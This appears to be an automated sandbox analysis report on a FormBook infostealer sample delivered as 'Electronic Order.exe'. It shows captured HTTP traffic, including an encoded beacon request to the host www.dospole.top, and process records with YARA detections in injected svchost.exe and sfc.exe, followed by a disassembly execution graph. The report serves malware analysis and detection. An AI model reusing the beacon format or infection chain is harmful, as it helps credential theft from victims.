                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                    Jul 11, 2024 15:07:50.859982967 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                    Jul 11, 2024 15:07:50.859993935 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                    Jul 11, 2024 15:07:50.860222101 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                    Jul 11, 2024 15:07:50.860233068 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                    Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                    Jul 11, 2024 15:07:50.860243082 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                    Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                    Jul 11, 2024 15:07:50.860255003 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                    Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                    Jul 11, 2024 15:07:50.860724926 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                    Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                    Jul 11, 2024 15:07:50.860737085 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                    Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                    Jul 11, 2024 15:07:50.860749006 CEST1236INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                    Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                    Jul 11, 2024 15:07:50.865112066 CEST1236INData Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                    Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.649756162.254.38.56806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:52.855523109 CEST578OUTGET /soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dospole.top
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:53.434295893 CEST1236INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:53 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                    Jul 11, 2024 15:07:53.434313059 CEST224INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                    Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-
                                    Jul 11, 2024 15:07:53.434324980 CEST1236INData Raw: 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30
                                    Data Ascii: 2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -
                                    Jul 11, 2024 15:07:53.434334993 CEST1236INData Raw: 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20
                                    Data Ascii: -linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.6811
                                    Jul 11, 2024 15:07:53.434474945 CEST1236INData Raw: 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20
                                    Data Ascii: troke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.74965
                                    Jul 11, 2024 15:07:53.434484959 CEST1236INData Raw: 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b
                                    Data Ascii: ll:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,
                                    Jul 11, 2024 15:07:53.434590101 CEST1236INData Raw: 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e
                                    Data Ascii: id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23
                                    Jul 11, 2024 15:07:53.434600115 CEST1120INData Raw: 32 33 38 20 2d 30 2e 31 31 37 38 33 33 2c 32 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31
                                    Data Ascii: 238 -0.117833,27.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt
                                    Jul 11, 2024 15:07:53.434611082 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                    Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                    Jul 11, 2024 15:07:53.434748888 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                    Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                    Jul 11, 2024 15:07:53.439491987 CEST1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                    Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:04:47
                                    Start date:11/07/2024
                                    Path:C:\Users\user\Desktop\Electronic Order.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Electronic Order.exe"
                                    Imagebase:0xdc0000
                                    File size:1'205'760 bytes
                                    MD5 hash:F44D956AA3A0C41F8E8CA7D9E9EAD69C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:04:47
                                    Start date:11/07/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Electronic Order.exe"
                                    Imagebase:0x810000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:09:05:06
                                    Start date:11/07/2024
                                    Path:C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"
                                    Imagebase:0x870000
                                    File size:140'800 bytes
                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:7
                                    Start time:09:05:08
                                    Start date:11/07/2024
                                    Path:C:\Windows\SysWOW64\sfc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                    Imagebase:0x980000
                                    File size:40'448 bytes
                                    MD5 hash:4D2662964EF299131D049EC1278BE08B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:09:05:31
                                    Start date:11/07/2024
                                    Path:C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"
                                    Imagebase:0x870000
                                    File size:140'800 bytes
                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:09:05:46
                                    Start date:11/07/2024
                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                    Imagebase:0x7ff728280000
                                    File size:676'768 bytes
                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:4%
                                      Dynamic/Decrypted Code Coverage:1.5%
                                      Signature Coverage:4.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:45
                                      execution_graph 98129 dc107d 98134 dc71eb 98129->98134 98131 dc108c 98165 de2f80 98131->98165 98135 dc71fb __write_nolock 98134->98135 98168 dc77c7 98135->98168 98139 dc72ba 98180 de074f 98139->98180 98146 dc77c7 59 API calls 98147 dc72eb 98146->98147 98199 dc7eec 98147->98199 98149 dc72f4 RegOpenKeyExW 98150 dfecda RegQueryValueExW 98149->98150 98154 dc7316 Mailbox 98149->98154 98151 dfed6c RegCloseKey 98150->98151 98152 dfecf7 98150->98152 98151->98154 98164 dfed7e _wcscat Mailbox __NMSG_WRITE 98151->98164 98203 de0ff6 98152->98203 98154->98131 98155 dfed10 98213 dc538e 98155->98213 98158 dc7b52 59 API calls 98158->98164 98159 dfed38 98216 dc7d2c 98159->98216 98161 dfed52 98161->98151 98163 dc3f84 59 API calls 98163->98164 98164->98154 98164->98158 98164->98163 98225 dc7f41 98164->98225 98293 de2e84 98165->98293 98167 dc1096 98169 de0ff6 Mailbox 59 API calls 98168->98169 98170 dc77e8 98169->98170 98171 de0ff6 Mailbox 59 API calls 98170->98171 98172 dc72b1 98171->98172 98173 dc4864 98172->98173 98229 df1b90 98173->98229 98176 dc7f41 59 API calls 98177 dc4897 98176->98177 98231 dc48ae 98177->98231 98179 dc48a1 Mailbox 98179->98139 98181 df1b90 __write_nolock 98180->98181 98182 de075c GetFullPathNameW 98181->98182 98183 de077e 98182->98183 98184 dc7d2c 59 API calls 98183->98184 98185 dc72c5 98184->98185 98186 dc7e0b 98185->98186 98187 dc7e1f 98186->98187 98188 dff173 98186->98188 98253 dc7db0 98187->98253 98258 dc8189 98188->98258 98191 dc72d3 98193 dc3f84 98191->98193 98192 dff17e __NMSG_WRITE _memmove 98194 dc3fb4 _memmove 98193->98194 98195 dc3f92 98193->98195 98196 de0ff6 Mailbox 59 API calls 98194->98196 98197 de0ff6 Mailbox 59 API calls 98195->98197 98198 dc3fc8 98196->98198 98197->98194 98198->98146 98200 dc7f06 98199->98200 98202 dc7ef9 98199->98202 98201 de0ff6 Mailbox 59 API calls 98200->98201 98201->98202 98202->98149 98205 de0ffe 98203->98205 98206 de1018 98205->98206 98208 de101c std::exception::exception 98205->98208 98261 de594c 98205->98261 98278 de35e1 DecodePointer 98205->98278 98206->98155 98279 de87db RaiseException 98208->98279 98210 de1046 98280 de8711 58 API calls _free 98210->98280 98212 de1058 98212->98155 98214 de0ff6 Mailbox 59 API calls 98213->98214 98215 dc53a0 RegQueryValueExW 98214->98215 98215->98159 98215->98161 98217 dc7d38 __NMSG_WRITE 98216->98217 98218 dc7da5 98216->98218 98221 dc7d4e 98217->98221 98222 dc7d73 98217->98222 98219 dc7e8c 59 API calls 98218->98219 98220 dc7d56 _memmove 98219->98220 98220->98161 98289 dc8087 98221->98289 98223 dc8189 59 API calls 98222->98223 98223->98220 98226 dc7f50 __NMSG_WRITE _memmove 98225->98226 98227 de0ff6 Mailbox 59 API calls 98226->98227 98228 dc7f8e 98227->98228 98228->98164 98230 dc4871 GetModuleFileNameW 98229->98230 98230->98176 98232 df1b90 __write_nolock 98231->98232 98233 dc48bb GetFullPathNameW 98232->98233 98234 dc48da 98233->98234 98235 dc48f7 98233->98235 98237 dc7d2c 59 API calls 98234->98237 98236 dc7eec 59 API calls 98235->98236 98238 dc48e6 98236->98238 98237->98238 98241 dc7886 98238->98241 98242 dc7894 98241->98242 98245 dc7e8c 98242->98245 98244 dc48f2 98244->98179 98246 dc7e9a 98245->98246 98248 dc7ea3 _memmove 98245->98248 98246->98248 98249 dc7faf 98246->98249 98248->98244 98250 dc7fc2 98249->98250 98252 dc7fbf _memmove 98249->98252 98251 de0ff6 Mailbox 59 API calls 98250->98251 98251->98252 98252->98248 98254 dc7dbf __NMSG_WRITE 98253->98254 98255 dc8189 59 API calls 98254->98255 98256 dc7dd0 _memmove 98254->98256 98257 dff130 _memmove 98255->98257 98256->98191 98259 de0ff6 Mailbox 59 API calls 98258->98259 98260 dc8193 98259->98260 98260->98192 98262 de59c7 98261->98262 98274 de5958 98261->98274 98287 de35e1 DecodePointer 98262->98287 98264 de59cd 98288 de8d68 58 API calls __getptd_noexit 98264->98288 98267 de598b RtlAllocateHeap 98267->98274 98277 de59bf 98267->98277 98269 de59b3 98285 de8d68 58 API calls __getptd_noexit 98269->98285 98273 de5963 98273->98274 98281 dea3ab 58 API calls __NMSG_WRITE 98273->98281 98282 dea408 58 API calls 4 library calls 98273->98282 98283 de32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98273->98283 98274->98267 98274->98269 98274->98273 98275 de59b1 98274->98275 98284 de35e1 DecodePointer 98274->98284 98286 de8d68 58 API calls __getptd_noexit 98275->98286 98277->98205 98278->98205 98279->98210 98280->98212 98281->98273 98282->98273 98284->98274 98285->98275 98286->98277 98287->98264 98288->98277 98290 dc8099 98289->98290 98291 dc809f 98289->98291 98290->98220 98292 de0ff6 Mailbox 59 API calls 98291->98292 98292->98290 98294 de2e90 _wprintf 98293->98294 98301 de3457 98294->98301 98300 de2eb7 _wprintf 98300->98167 98318 de9e4b 98301->98318 98303 de2e99 98304 de2ec8 DecodePointer DecodePointer 98303->98304 98305 de2ea5 98304->98305 98306 de2ef5 98304->98306 98315 de2ec2 98305->98315 98306->98305 98364 de89e4 59 API calls __vswprintf_l 